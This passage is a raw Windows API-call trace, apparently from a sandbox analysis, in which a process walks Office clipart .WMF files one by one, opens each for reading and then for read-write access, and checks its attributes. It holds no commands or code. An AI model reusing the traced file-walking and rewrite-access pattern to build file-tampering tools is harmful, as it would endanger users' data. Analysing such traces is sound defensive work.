[0102.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0102.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0102.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.833] AreFileApisANSI () returned 1 [0102.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0102.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.833] AreFileApisANSI () returned 1 [0102.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0102.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 69 [0102.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.834] GetFileType (hFile=0x33c) returned 0x1 [0102.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0102.834] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.834] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.834] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.834] CloseHandle (hObject=0x33c) returned 1 [0102.834] AreFileApisANSI () returned 1 [0102.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0102.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 69 [0102.835] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.835] GetFileType (hFile=0x33c) returned 0x1 [0102.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0102.835] CloseHandle (hObject=0x33c) returned 1 [0102.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0102.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0102.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0102.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0102.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0102.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0102.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.836] AreFileApisANSI () returned 1 [0102.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0102.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 69 [0102.836] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd5c704c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd5c704c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6396e0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32c)) returned 1 [0102.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0102.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0102.836] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.836] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.836] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x332e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00390_.WMF", cAlternateFileName="")) returned 1 [0102.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0102.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0102.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0102.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0102.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0102.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0102.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0102.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0102.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0102.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8abb8 [0102.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0102.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0102.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.837] AreFileApisANSI () returned 1 [0102.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0102.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.838] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0102.838] AreFileApisANSI () returned 1 [0102.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0102.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 69 [0102.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00390_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.938] GetFileType (hFile=0x33c) returned 0x1 [0102.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0102.939] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.939] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.939] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.939] CloseHandle (hObject=0x33c) returned 1 [0102.939] AreFileApisANSI () returned 1 [0102.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ab20 [0102.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 69 [0102.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00390_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.939] GetFileType (hFile=0x33c) returned 0x1 [0102.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0102.940] CloseHandle (hObject=0x33c) returned 1 [0102.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0102.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0102.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0102.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0102.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0102.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0102.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0102.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0102.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.941] AreFileApisANSI () returned 1 [0102.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b110 [0102.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8b110, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 69 [0102.941] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00390_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x332e)) returned 1 [0102.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0102.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0102.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0102.941] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.941] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.941] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd685b3d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd685b3d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, 